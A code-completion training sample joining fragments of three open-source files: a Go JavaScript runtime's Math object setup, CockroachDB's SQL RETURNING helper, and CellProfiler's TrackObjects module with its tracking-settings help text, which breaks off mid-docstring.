m._putProp("floor", r.newNativeFunc(r.math_floor, nil, "floor", nil, 1), true, false, true)
m._putProp("log", r.newNativeFunc(r.math_log, nil, "log", nil, 1), true, false, true)
m._putProp("max", r.newNativeFunc(r.math_max, nil, "max", nil, 2), true, false, true)
m._putProp("min", r.newNativeFunc(r.math_min, nil, "min", nil, 2), true, false, true)
m._putProp("pow", r.newNativeFunc(r.math_pow, nil, "pow", nil, 2), true, false, true)
m._putProp("random", r.newNativeFunc(r.math_random, nil, "random", nil, 0), true, false, true)
m._putProp("round", r.newNativeFunc(r.math_round, nil, "round", nil, 1), true, false, true)
m._putProp("sin", r.newNativeFunc(r.math_sin, nil, "sin", nil, 1), true, false, true)
m._putProp("sqrt", r.newNativeFunc(r.math_sqrt, nil, "sqrt", nil, 1), true, false, true)
m._putProp("tan", r.newNativeFunc(r.math_tan, nil, "tan", nil, 1), true, false, true)
return m
}
func (r *Runtime) initMath() {
r.addToGlobal("Math", r.newLazyObject(r.createMath))
}<|fim▁end|> | m._putProp("LN2", valueFloat(math.Ln2), false, false, false) |
<|file_name|>returning.go<|end_file_name|><|fim▁begin|>// Copyright 2016 The Cockroach Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");<|fim▁hole|>//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
// implied. See the License for the specific language governing
// permissions and limitations under the License.
//
// Author: Matt Jibson ([email protected])
package sql
import "github.com/cockroachdb/cockroach/sql/parser"
// returningNode accumulates the results for a RETURNING clause. If the rows are empty, we just
// keep track of the count.
type returningNode struct {
valuesNode
rowCount int
}
// returningHelper implements the logic used for statements with RETURNING clauses. It accumulates
// result rows, one for each call to append().
type returningHelper struct {
p *planner
results *returningNode
// Processed copies of expressions from ReturningExprs.
exprs parser.Exprs
qvals qvalMap
}
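// For instance (an illustrative example, not from the source), for a statement
// like `INSERT ... RETURNING a + 1, b`, exprs holds the two resolved
// expressions and each append() evaluates them against the inserted row.
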
func makeReturningHelper(p *planner, r parser.ReturningExprs,
alias string, tablecols []ColumnDescriptor) (returningHelper, error) {
rh := returningHelper{p: p, results: &returningNode{}}
if len(r) == 0 {
return rh, nil
}
rh.results.columns = make([]ResultColumn, 0, len(r))
table := tableInfo{
columns: makeResultColumns(tablecols, 0),
alias: alias,
}
rh.qvals = make(qvalMap)
rh.exprs = make([]parser.Expr, 0, len(r))
for _, target := range r {
if isStar, cols, exprs, err := checkRenderStar(target, &table, rh.qvals); err != nil {
return returningHelper{}, err
} else if isStar {
rh.exprs = append(rh.exprs, exprs...)
rh.results.columns = append(rh.results.columns, cols...)
continue
}
// When generating an output column name it should exactly match the original
// expression, so determine the output column name before we perform any
// manipulations to the expression.
outputName := getRenderColName(target)
expr, err := resolveQNames(&table, rh.qvals, target.Expr)
if err != nil {
return returningHelper{}, err
}
typ, err := expr.TypeCheck(rh.p.evalCtx.Args)
if err != nil {
return returningHelper{}, err
}
rh.exprs = append(rh.exprs, expr)
rh.results.columns = append(rh.results.columns, ResultColumn{Name: outputName, Typ: typ})
}
return rh, nil
}
// append adds a result row. The row is computed according to the ReturningExprs, with input values
// from rowVals.
func (rh *returningHelper) append(rowVals parser.DTuple) error {
if rh.exprs == nil {
rh.results.rowCount++
return nil
}
rh.qvals.populateQVals(rowVals)
resrow := make(parser.DTuple, len(rh.exprs))
for i, e := range rh.exprs {
d, err := e.Eval(rh.p.evalCtx)
if err != nil {
return err
}
resrow[i] = d
}
rh.results.rows = append(rh.results.rows, resrow)
return nil
}
// getResults returns the results as a returningNode.
func (rh *returningHelper) getResults() *returningNode {
return rh.results
}<|fim▁end|> | // you may not use this file except in compliance with the License.
// You may obtain a copy of the License at |
<|file_name|>trackobjects.py<|end_file_name|><|fim▁begin|>from cellprofiler.gui.help import USING_METADATA_HELP_REF, USING_METADATA_GROUPING_HELP_REF, LOADING_IMAGE_SEQ_HELP_REF
TM_OVERLAP = 'Overlap'
TM_DISTANCE = 'Distance'
TM_MEASUREMENTS = 'Measurements'
TM_LAP = "LAP"
TM_ALL = [TM_OVERLAP, TM_DISTANCE, TM_MEASUREMENTS,TM_LAP]
LT_NONE = 0
LT_PHASE_1 = 1
LT_SPLIT = 2
LT_MITOSIS = 3
LT_GAP = 4
KM_VEL = 1
KM_NO_VEL = 0
KM_NONE = -1
'''Random motion model, for instance Brownian motion'''
M_RANDOM = "Random"
'''Velocity motion model, object position depends on prior velocity'''
M_VELOCITY = "Velocity"
'''Random and velocity models'''
M_BOTH = "Both"
RADIUS_STD_SETTING_TEXT = 'Number of standard deviations for search radius'
RADIUS_LIMIT_SETTING_TEXT = 'Search radius limit, in pixel units (Min,Max)'
ONLY_IF_2ND_PHASE_LAP_TEXT = '''<i>(Used only if the %(TM_LAP)s tracking method is applied and the second phase is run)</i>'''%globals()
import cellprofiler.icons
from cellprofiler.gui.help import PROTIP_RECOMEND_ICON, PROTIP_AVOID_ICON, TECH_NOTE_ICON
__doc__ = """
<b>Track Objects</b> allows tracking objects throughout sequential
frames of a series of images, so that from frame to frame
each object maintains a unique identity in the output measurements
<hr>
This module must be placed downstream of a module that identifies objects
(e.g., <b>IdentifyPrimaryObjects</b>). <b>TrackObjects</b> will associate each
object with the same object in the frames before and after. This allows the study
of objects' lineages and the timing and characteristics of dynamic events in
movies.
<p>Images in CellProfiler are processed sequentially by frame (whether loaded as a
series of images or a movie file). To process a collection of images/movies,
you will need to do the following:
<ul>
<li>Define each individual movie using metadata
either contained within the image file itself or as part of the images nomenclature
or folder structure. %(USING_METADATA_HELP_REF)s.</li>
<li>Group the movies to make sure
that each image sequence is handled individually. %(USING_METADATA_GROUPING_HELP_REF)s.
</li>
</ul>
For complete details, see <i>%(LOADING_IMAGE_SEQ_HELP_REF)s</i>.</p>
<p>For an example pipeline using TrackObjects, see the CellProfiler
<a href="http://www.cellprofiler.org/examples.shtml#Tracking">Examples</a> webpage.</p>
<h4>Available measurements</h4>
<b>Object measurements</b>
<ul>
<li><i>Label:</i> Each tracked object is assigned a unique identifier (label).
Child objects resulting from a split or merge are assigned the label of the ancestor.</li>
<li><i>ParentImageNumber, ParentObjectNumber:</i> The <i>ImageNumber</i> and
<i>ObjectNumber</i> of the parent object in the prior frame. For a split, each
child object will have the label of the object it split from. For a merge,
the child will have the label of the closest parent.</li>
<li><i>TrajectoryX, TrajectoryY:</i> The direction of motion (in x and y coordinates) of the
object from the previous frame to the current frame.</li>
<li><i>DistanceTraveled:</i> The distance traveled by the object from the
previous frame to the current frame (calculated as the magnitude of
the trajectory vectors).</li>
<li><i>Displacement:</i> The shortest distance traveled by the object from its
initial starting position to the position in the current frame. That is, it is
the straight-line path between the two points.</li>
<li><i>IntegratedDistance:</i> The total distance traveled by the object during
the lifetime of the object.</li>
<li><i>Linearity:</i> A measure of how linear the object trajectory is during the
object lifetime. Calculated as (displacement from initial to final
location)/(integrated object distance). Value is in range of [0,1].</li>
<li><i>Lifetime:</i> The number of frames an object has existed. The lifetime starts
at 1 at the frame when an object appears, and is incremented with each frame that the
object persists. At the final frame of the image set/movie, the
lifetimes of all remaining objects are output.</li>
<li><i>FinalAge:</i> Similar to <i>LifeTime</i> but is only output at the final
frame of the object's life (or the movie ends, whichever comes first). At this point,
the final age of the object is output; no values are stored for earlier frames.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> This value
is useful if you want to plot a histogram of the object lifetimes; all but the final age
can be ignored or filtered out.</dd>
</dl></li>
</ul>
The following object measurements are specific to the %(TM_LAP)s tracking method:
<ul>
<li><i>LinkType:</i> The linking method used to link the object to its parent.
Possible values are
<ul>
<li><b>%(LT_NONE)d</b>: The object was not linked to a parent.</li>
<li><b>%(LT_PHASE_1)d</b>: The object was linked to a parent in the previous frame.</li>
<li><b>%(LT_SPLIT)d</b>: The object is linked as the start of a split path.</li>
<li><b>%(LT_MITOSIS)d</b>: The object was linked to its parent as a daughter of
a mitotic pair.</li>
<li><b>%(LT_GAP)d</b>: The object was linked to a parent in a frame prior to the
previous frame (a gap).</li>
</ul>
Under some circumstances, multiple linking methods may apply to a given object, e.g., an
object may be both the beginning of a split path and not have a parent. However, only
one linking method is assigned.</li>
<li><i>MovementModel:</i> The movement model used to track the object.
<ul>
<li><b>%(KM_NO_VEL)d</b>: The <i>%(M_RANDOM)s</i> model was used.</li>
<li><b>%(KM_VEL)d</b>: The <i>%(M_VELOCITY)s</i> model was used.</li>
<li><b>-1</b>: Neither model was used. This can occur under two circumstances:
<ul>
<li>At the beginning of a trajectory, when there is no data to determine the model as
yet.</li>
<li>At the beginning of a closed gap, since a model was not actually applied to make
the link in the first phase.</li>
</ul></li>
</ul>
</li>
<li><i>LinkingDistance:</i> The difference between the propagated position of an
object and the object to which it is matched.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> A slowly decaying histogram of
these distances indicates that the search radius is large enough. A cut-off histogram
is a sign that the search radius is too small.</dd>
</dl></li>
<li><i>StandardDeviation:</i> The Kalman filter maintains a running estimate
of the variance of the error in estimated position for each model.
This measurement records the linking distance divided by the standard deviation
of the error when linking the object with its parent.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> This value is multiplied by
the <i>"%(RADIUS_STD_SETTING_TEXT)s"</i> setting to constrain the search distance.
A histogram of this value can help determine if the <i>"%(RADIUS_LIMIT_SETTING_TEXT)s"</i>
setting is appropriate.</dd>
</dl>
</li>
<li><i>GapLength:</i> The number of frames between an object and its parent.
For instance, an object in frame 3 with a parent in frame 1 has a gap length of
2.</li>
<li><i>GapScore:</i> If an object is linked to its parent by bridging a gap,
this value is the score for the gap.</li>
<li><i>SplitScore:</i> If an object linked to its parent via a split, this
value is the score for the split.</li>
<li><i>MergeScore:</i> If an object linked to a child via a merge, this value is
the score for the merge.</li>
<li><i>MitosisScore:</i> If an object linked to two children via a mitosis,
this value is the score for the mitosis.</li>
</ul>
<b>Image measurements</b>
<ul>
<li><i>LostObjectCount:</i> Number of objects that appear in the previous frame
but have no identifiable child in the current frame.</li>
<li><i>NewObjectCount:</i> Number of objects that appear in the current frame but
have no identifiable parent in the previous frame. </li>
<li><i>SplitObjectCount:</i> Number of objects in the current frame that
resulted from a split from a parent object in the previous frame.</li>
<li><i>MergedObjectCount:</i> Number of objects in the current frame that
resulted from the merging of parent objects in the previous frame.</li>
</ul>
See also: Any of the <b>Measure</b> modules, <b>IdentifyPrimaryObjects</b>, <b>Groups</b>.
"""%globals()
# CellProfiler is distributed under the GNU General Public License.
# See the accompanying file LICENSE for details.
#
# Copyright (c) 2003-2009 Massachusetts Institute of Technology
# Copyright (c) 2009-2015 Broad Institute
#
# Please see the AUTHORS file for credits.
#
# Website: http://www.cellprofiler.org
import logging
logger = logging.getLogger(__name__)
import numpy as np
import numpy.ma
from scipy.ndimage import distance_transform_edt
import scipy.ndimage
import scipy.sparse
import cellprofiler.cpmodule as cpm
import cellprofiler.cpimage as cpi
import cellprofiler.pipeline as cpp
import cellprofiler.settings as cps
from cellprofiler.settings import YES, NO
import cellprofiler.measurements as cpmeas
import cellprofiler.preferences as cpprefs
from cellprofiler.cpmath.lapjv import lapjv
import cellprofiler.cpmath.filter as cpfilter
from cellprofiler.cpmath.cpmorphology import fixup_scipy_ndimage_result as fix
from cellprofiler.cpmath.cpmorphology import centers_of_labels
from cellprofiler.cpmath.cpmorphology import associate_by_distance
from cellprofiler.cpmath.cpmorphology import all_connected_components
from cellprofiler.cpmath.index import Indexes
from identify import M_LOCATION_CENTER_X, M_LOCATION_CENTER_Y
from cellprofiler.gui.help import HELP_ON_MEASURING_DISTANCES
DT_COLOR_AND_NUMBER = 'Color and Number'
DT_COLOR_ONLY = 'Color Only'
DT_ALL = [DT_COLOR_AND_NUMBER, DT_COLOR_ONLY]
R_PARENT = "Parent"
F_PREFIX = "TrackObjects"
F_LABEL = "Label"
F_PARENT_OBJECT_NUMBER = "ParentObjectNumber"
F_PARENT_IMAGE_NUMBER = "ParentImageNumber"
F_TRAJECTORY_X = "TrajectoryX"
F_TRAJECTORY_Y = "TrajectoryY"
F_DISTANCE_TRAVELED = "DistanceTraveled"
F_DISPLACEMENT = "Displacement"
F_INTEGRATED_DISTANCE = "IntegratedDistance"
F_LINEARITY = "Linearity"
F_LIFETIME = "Lifetime"
F_FINAL_AGE = "FinalAge"
F_MOVEMENT_MODEL = "MovementModel"
F_LINK_TYPE = "LinkType"
F_LINKING_DISTANCE = "LinkingDistance"
F_STANDARD_DEVIATION = "StandardDeviation"
F_GAP_LENGTH = "GapLength"
F_GAP_SCORE = "GapScore"
F_MERGE_SCORE = "MergeScore"
F_SPLIT_SCORE = "SplitScore"
F_MITOSIS_SCORE = "MitosisScore"
F_KALMAN = "Kalman"
F_STATE = "State"
F_COV = "COV"
F_NOISE = "Noise"
F_VELOCITY_MODEL = "Vel"
F_STATIC_MODEL = "NoVel"
F_X = "X"
F_Y = "Y"
F_VX = "VX"
F_VY = "VY"
F_EXPT_ORIG_NUMTRACKS = "%s_OriginalNumberOfTracks"%F_PREFIX
F_EXPT_FILT_NUMTRACKS = "%s_FilteredNumberOfTracks"%F_PREFIX
def kalman_feature(model, matrix_or_vector, i, j=None):
'''Return the feature name for a Kalman feature
model - model used for Kalman feature: velocity or static
matrix_or_vector - the part of the Kalman state to save, vec, COV or noise
i - the name for the first (or only for vec and noise) index into the vector
j - the name of the second index into the matrix
'''
pieces = [F_KALMAN, model, matrix_or_vector, i]
if j is not None:
pieces.append(j)
return "_".join(pieces)
'''# of objects in the current frame without parents in the previous frame'''
F_NEW_OBJECT_COUNT = "NewObjectCount"
'''# of objects in the previous frame without parents in the new frame'''
F_LOST_OBJECT_COUNT = "LostObjectCount"
'''# of parents that split into more than one child'''
F_SPLIT_COUNT = "SplitObjectCount"
'''# of children that are merged from more than one parent'''
F_MERGE_COUNT = "MergedObjectCount"
'''Object area measurement for LAP method
The final part of the LAP method needs the object area measurement
which is stored using this name.'''
F_AREA = "Area"
F_ALL_COLTYPE_ALL = [(F_LABEL, cpmeas.COLTYPE_INTEGER),
(F_PARENT_OBJECT_NUMBER, cpmeas.COLTYPE_INTEGER),
(F_PARENT_IMAGE_NUMBER, cpmeas.COLTYPE_INTEGER),
(F_TRAJECTORY_X, cpmeas.COLTYPE_INTEGER),
(F_TRAJECTORY_Y, cpmeas.COLTYPE_INTEGER),
(F_DISTANCE_TRAVELED, cpmeas.COLTYPE_FLOAT),
(F_DISPLACEMENT, cpmeas.COLTYPE_FLOAT),
(F_INTEGRATED_DISTANCE, cpmeas.COLTYPE_FLOAT),
(F_LINEARITY, cpmeas.COLTYPE_FLOAT),
(F_LIFETIME, cpmeas.COLTYPE_INTEGER),
(F_FINAL_AGE, cpmeas.COLTYPE_INTEGER)]
F_IMAGE_COLTYPE_ALL = [(F_NEW_OBJECT_COUNT, cpmeas.COLTYPE_INTEGER),
(F_LOST_OBJECT_COUNT, cpmeas.COLTYPE_INTEGER),
(F_SPLIT_COUNT, cpmeas.COLTYPE_INTEGER),
(F_MERGE_COUNT, cpmeas.COLTYPE_INTEGER)]
F_ALL = [feature for feature, coltype in F_ALL_COLTYPE_ALL]
F_IMAGE_ALL = [feature for feature, coltype in F_IMAGE_COLTYPE_ALL]
class TrackObjects(cpm.CPModule):
module_name = 'TrackObjects'
category = "Object Processing"
variable_revision_number = 6
def create_settings(self):
self.tracking_method = cps.Choice(
'Choose a tracking method',
TM_ALL, doc="""
When trying to track an object in an image,
<b>TrackObjects</b> will search within a maximum
specified distance (see the <i>distance within which to search</i> setting)
of the object's location in the previous image, looking for a "match".
Objects that match are assigned the same number, or label, throughout the
entire movie.
There are several options for the method used to find a match. Choose
among these options based on which is most consistent from frame
to frame of your movie.
<ul>
<li><i>%(TM_OVERLAP)s:</i> Compares the amount of spatial overlap between identified objects in
the previous frame with those in the current frame. The object with the
greatest amount of spatial overlap will be assigned the same number (label).
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s">
Recommended when there is a high degree of overlap of an object from one frame to the next,
which is the case for movies with high frame rates relative to object motion.</dd>
</dl></li>
<li><i>%(TM_DISTANCE)s:</i> Compares the distance between each identified
object in the previous frame with that of the current frame. The
closest objects to each other will be assigned the same number (label).
Distances are measured from the perimeter of each object.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s">
Recommended for cases where the objects are not very crowded but where
<i>%(TM_OVERLAP)s</i> does not work sufficiently well, which is the case
for movies with low frame rates relative to object motion.</dd>
</dl></li>
<li><i>%(TM_MEASUREMENTS)s:</i> Compares each object in the
current frame with objects in the previous frame based on a particular
feature you have measured for the objects (for example, a particular intensity
or shape measurement that can distinguish nearby objects). The object
with the closest-matching measurement will be selected as a match and will be
assigned the same number (label). This selection requires that you run the
specified <b>Measure</b> module previous to this module in the pipeline so
that the measurement values can be used to track the objects.</li>
<li><i>%(TM_LAP)s:</i> Uses the linear assignment problem (LAP) framework. The
linear assignment problem (LAP) algorithm (<i>Jaqaman et al., 2008</i>)
addresses the challenges of high object density, motion heterogeneity,
temporary disappearances, and object merging and splitting.
The algorithm first links objects between consecutive frames and then links
the resulting partial trajectories into complete trajectories. Both steps are formulated
as global combinatorial optimization problems whose solution identifies the overall
most likely set of object trajectories throughout a movie.
<p>Tracks are constructed from an image sequence by detecting objects in each
frame and linking objects between consecutive frames as a first step. This step alone
may result in incompletely tracked objects due to the appearance and disappearance
of objects, either in reality or apparently because of noise and imaging limitations.
To correct this, you may apply an optional second step which closes temporal gaps
between tracked objects and captures merging and splitting events. This step takes
place at the end of the analysis run.</p>
<p><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Some recommendations on optimizing
the LAP settings<br>
<ul>
<li><i>Work with a minimal subset of your data:</i> Attempting to optimize these settings
by examining a dataset containing many objects may be complicated and frustrating.
Therefore, it is a good idea to work with a smaller portion of the data containing the
behavior of interest.
<ul>
<li>For example, if splits characterize your data, try narrowing down to following just
one cell that undergoes a split, and examine a few frames before and after the event.</li>
<li>You can insert the <b>Crop</b> module to zoom in on a region of interest, optimize the
settings and then either remove or disable the module when done.</li>
<li>You can also use the <b>Input</b> modules to limit yourself to a few frames under
consideration. For example, use the filtering settings in the <b>Images</b> module to
use only certain files from the movie in the pipeline.</li>
</ul></li>
<li><i>Begin by optimizing the settings for the first phase of the LAP:</i> The 2nd phase of
the LAP method depends on the results of the first phase. Therefore, it is a good idea to
optimize the first phase settings as the initial step.
<ul>
<li>You can disable 2nd phase calculation by selecting <i>%(NO)s</i> for "Run the second
phase of the LAP algorithm?"</li>
<li>By maximizing the number of correct frame-to-frame links in the first phase, the
2nd phase will have fewer candidates to consider for linking and a better chance of
closing gaps correctly. </li>
<li>If tracks are not being linked in the first phase, you may need to adjust the number
of standard deviations for the search radius and/or the radius limits (most likely
the maximum limit). See the help for these settings for details.</li>
</ul></li>
<li><i>Use any visualization tools at your disposal:</i> Visualizing the data often allows for
easier decision making as opposed to sorting through tabular data alone.
<ul>
<li>The <a href="http://cran.r-project.org/">R</a> open-source software package has
analysis and visualization tools that can query a database. See <a href=
"http://www.broadinstitute.org/~leek/rtracking.html">here</a> for a use case by our
lead software engineer.</li>
<li><a href="http://cellprofiler.org/tracer/">CellProfiler Tracer</a> is a version of
CellProfiler Analyst that contains tools for visualizing time-lapse data that has been exported
using the <b>ExportToDatabase</b> module.</li>
</ul></li>
</ul>
</p>
<p><b>References</b>
<ul>
<li>Jaqaman K, Loerke D, Mettlen M, Kuwata H, Grinstein S, Schmid SL, Danuser G. (2008)
"Robust single-particle tracking in live-cell time-lapse sequences."
<i>Nature Methods</i> 5(8),695-702.
<a href="http://dx.doi.org/10.1038/nmeth.1237">(link)</a></li>
<li>Jaqaman K, Danuser G. (2009) "Computational image analysis of cellular dynamics:
a case study based on particle tracking." Cold Spring Harb Protoc. 2009(12):pdb.top65.
<a href="http://dx.doi.org/10.1101/pdb.top65">(link)</a></li>
</ul></p>
</li>
</ul>"""%globals())
self.object_name = cps.ObjectNameSubscriber(
'Select the objects to track',cps.NONE, doc="""
Select the objects to be tracked by this module.""")
self.measurement = cps.Measurement(
'Select object measurement to use for tracking',
lambda : self.object_name.value, doc="""
<i>(Used only if Measurements is the tracking method)</i><br>
Select which type of measurement (category) and which specific feature from the
<b>Measure</b> module will be used for tracking. Select the feature name from
the popup box or see each <b>Measure</b> module's help for the list of
features measured by that module. If necessary, you will also be asked
to specify additional details such as the
image from which the measurements originated or the measurement scale.""")
self.pixel_radius = cps.Integer(
'Maximum pixel distance to consider matches',50,minval=1,doc="""
Objects in the subsequent frame will be considered potential matches if
they are within this distance. To determine a suitable pixel distance, you can look
at the axis increments on each image (shown in pixel units) or
use the distance measurement tool. %(HELP_ON_MEASURING_DISTANCES)s"""%globals())
self.model = cps.Choice(
"Select the movement model",[M_RANDOM, M_VELOCITY, M_BOTH], value=M_BOTH,doc = """
<i>(Used only if the %(TM_LAP)s tracking method is applied)</i><br>
This setting controls how to predict an object's position in
the next frame, assuming that each object moves randomly with
a frame-to-frame variance in position that follows a Gaussian
distribution.<br>
<ul>
<li><i>%(M_RANDOM)s:</i> A model in which objects move due to
Brownian Motion or a similar process where the variance in position
differs between objects.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s">
Use this model if the objects move with some
random jitter around a stationary location.</dd>
</dl></li>
<li><i>%(M_VELOCITY)s:</i> A model in which the object moves with
a velocity. Both velocity and position (after correcting for
velocity) vary following a Gaussian distribution.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Use this model if
the objects move along a spatial trajectory in some direction over time.</dd>
</dl></li>
<li><i>%(M_BOTH)s:</i> <b>TrackObjects</b> will predict each
object's position using both models and use the model with the
lowest penalty to join an object in one frame with one in another.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Use this
option if both models above are applicable over time.</dd>
</dl></li>
</ul>""" % globals())
self.radius_std = cps.Float(
RADIUS_STD_SETTING_TEXT, 3, minval=1,doc = """
<i>(Used only if the %(TM_LAP)s tracking method is applied)</i>
<br>
<b>TrackObjects</b> will estimate the standard deviation of the error
between the observed and predicted positions of an object for
each movement model. It will constrain the search for matching
objects from one frame to the next to the standard deviation
of the error times the number of standard
deviations that you enter here.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>If the standard deviation is quite small, but the object makes a
large spatial jump, this value may need to be set higher in order
to increase the search area and thereby make the frame-to-frame
linkage.</li>
</ul></dd>
</dl>"""%globals())
self.radius_limit = cps.FloatRange(
RADIUS_LIMIT_SETTING_TEXT, (2, 10), minval = 0,doc = """
<i>(Used only if the %(TM_LAP)s tracking method is applied)</i><br>
<b>TrackObjects</b> derives a search radius based on the error
estimation. Potentially, the module can make an erroneous assignment
with a large error, leading to a large estimated error for
the object in the next frame. Conversely, the module can arrive
at a small estimated error by chance, leading to a maximum radius
that does not track the object in a subsequent frame. The radius
limit constrains the maximum radius to reasonable values.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>Special care must be taken to adjust the upper limit appropriately
for the data.</li>
<li>The lower limit should be set to a radius (in pixels) that is a
reasonable displacement for any object from one frame to the next. Hence,
if you notice that a frame-to-frame linkage is not being made for a
steadily-moving object, it may be that this value needs to be increased
so that the search radius does not fall below the object's displacement.</li>
<li>The upper limit should be set to the maximum reasonable
displacement (in pixels) under any circumstances. Hence, if you notice that
a frame-to-frame linkage is not being made in the case of an unusually
large displacement, this value may need to be increased.</li>
</ul></dd>
</dl>"""%globals())
self.wants_second_phase = cps.Binary(
"Run the second phase of the LAP algorithm?", True, doc="""
<i>(Used only if the %(TM_LAP)s tracking method is applied)</i><br>
Select <i>%(YES)s</i> to run the second phase of the LAP algorithm
after processing all images. Select <i>%(NO)s</i> to omit the
second phase, or to defer it until you run the module
as a data tool.
<p>Since object tracks may start and end not only because of the true appearance
and disappearance of objects, but also because of apparent disappearances due
to noise and limitations in imaging, you may want to run the second phase
which attempts to close temporal gaps between tracked objects and tries to
capture merging and splitting events.</p>
<p>For additional details on optimizing the LAP settings, see the help for each
the settings.</p>"""%globals())
self.gap_cost = cps.Integer(
'Gap closing cost', 40, minval=1, doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
This setting assigns a cost to keeping a gap open
when an object is missing from one of the frames of a track (the
alternative to keeping the gap is to bridge it by connecting
the tracks on either side of the missing frames).
The cost of bridging a gap is the distance, in pixels, of the
displacement of the object between frames.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>Set the gap closing cost higher if tracks from objects in previous
frames are being erroneously joined, across a gap, to tracks from
objects in subsequent frames. </li>
<li>Set the gap closing cost lower if tracks
are not properly joined due to gaps caused by mis-segmentation.</li>
</ul></dd>
</dl>'''%globals())
self.split_cost = cps.Integer(
'Split alternative cost', 40, minval=1, doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
This setting is the cost of keeping two tracks distinct
when the alternative is to make them into one track that
splits. A split occurs when an object in one frame is assigned
to the same track as two objects in a subsequent frame.
The split cost takes two components into account:
<ul>
<li>The area of the split object relative to the area of
the resulting objects.</li>
<li>The displacement of the resulting
objects relative to the position of the original object.</li>
</ul>
The split cost is roughly measured in pixels. The split alternative cost is
(conceptually) subtracted from the cost of making the split.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>The split cost should be set lower if objects are being split
that should not be split. </li>
<li>The split cost should be set higher if objects
that should be split are not.</li>
<li>If you are confident that there should be no splits present in the data,
the cost can be set to 1 (the minimum value possible)</li>
</ul></dd>
</dl>'''%globals())
self.merge_cost = cps.Integer(
'Merge alternative cost', 40, minval=1,doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
This setting is the cost of keeping two tracks
distinct when the alternative is to merge them into one.
A merge occurs when two objects in one frame are assigned to
the same track as a single object in a subsequent frame.
The merge score takes two components into account:
<ul>
<li>The area of the two objects
to be merged relative to the area of the resulting objects.</li>
<li>The displacement of the original objects relative to the final
object. </li>
</ul>
The merge cost is measured in pixels. The merge
alternative cost is (conceptually) subtracted from the
cost of making the merge.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>Set the merge alternative cost lower if objects are being
merged when they should otherwise be kept separate. </li>
<li>Set the merge alternative cost
higher if objects that are not merged should be merged.</li>
<li>If you are confident that there should be no merges present in the data,
the cost can be set to 1 (the minimum value possible)</li>
</ul></dd>
</dl>'''%globals())
self.mitosis_cost = cps.Integer(
'Mitosis alternative cost', 80, minval=1, doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
This setting is the cost of not linking a parent and two daughters
via the mitosis model. The %(TM_LAP)s tracking method weighs this
cost against the score of a potential mitosis. The model expects
the daughters to be equidistant from the parent after mitosis,
so the parent location is expected to be midway between the daughters.
In addition, the model expects the daughters' areas to be equal
to the parent's area. The mitosis score is the distance error
of the parent times the area inequality ratio of the parent and
daughters (the larger of Area(daughters) / Area(parent) and
Area(parent) / Area(daughters)).<br>
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>An accepted mitosis closes two gaps, so all things being equal,
the mitosis alternative cost should be approximately double the
gap closing cost.</li>
<li>Increase the mitosis alternative cost to favor more mitoses,
and decrease it to prevent mitosis candidates from being
accepted.</li>
</ul></dd>
</dl>'''%globals())
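# A sketch of the mitosis score described in the help text above, using
# hypothetical parent/daughter measurements (the actual scoring happens
# in the second-phase code below):
#
#     d = distance(parent_centroid, midpoint(daughter1, daughter2))
#     rho = max(area_daughters / area_parent, area_parent / area_daughters)
#     mitosis_score = d * rho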
self.mitosis_max_distance = cps.Integer(
'Maximum mitosis distance, in pixel units', 40, minval=1, doc= '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
This setting is the maximum allowed distance in pixels of either
of the daughter candidate centroids after mitosis from the parent candidate.
'''%globals())
self.max_gap_score = cps.Integer(
'Maximum gap displacement, in pixel units', 5, minval=1, doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
This setting acts as a filter for unreasonably large
displacements during the second phase.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>The maximum gap displacement should be set to roughly
the maximum displacement of an object's center from frame to frame. An object that makes large
frame-to-frame jumps should have a higher value for this setting than one that only moves slightly.</li>
<li>Be aware that the LAP algorithm will run more slowly with a higher maximum gap displacement
value, since the higher this value, the more objects that must be compared at each step.</li>
<li>Objects that would have been tracked between successive frames for a lower maximum displacement
may not be tracked if the value is set higher.</li>
<li>This setting may be the culprit if an object is not tracked frame-to-frame despite optimizing
the LAP first-pass settings.</li>
</ul></dd>
</dl>'''%globals())
self.max_merge_score = cps.Integer(
'Maximum merge score', 50, minval=1, doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
This setting acts as a filter for unreasonably large
merge scores. The merge score has two components:
<ul>
<li>The area of the resulting merged object relative to the area of the
two objects to be merged.</li>
<li>The distances between the objects to be merged and the resulting object. </li>
</ul>
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> Recommendations:
<ul>
<li>The LAP algorithm will run more slowly with a higher maximum merge score value. </li>
<li>Objects that would have been merged at a lower maximum merge score will not be considered for merging.</li>
</ul></dd>
</dl>'''%globals())
self.max_split_score = cps.Integer(
'Maximum split score', 50, minval=1, doc = '''
%(ONLY_IF_2ND_PHASE_LAP_TEXT)s<br>
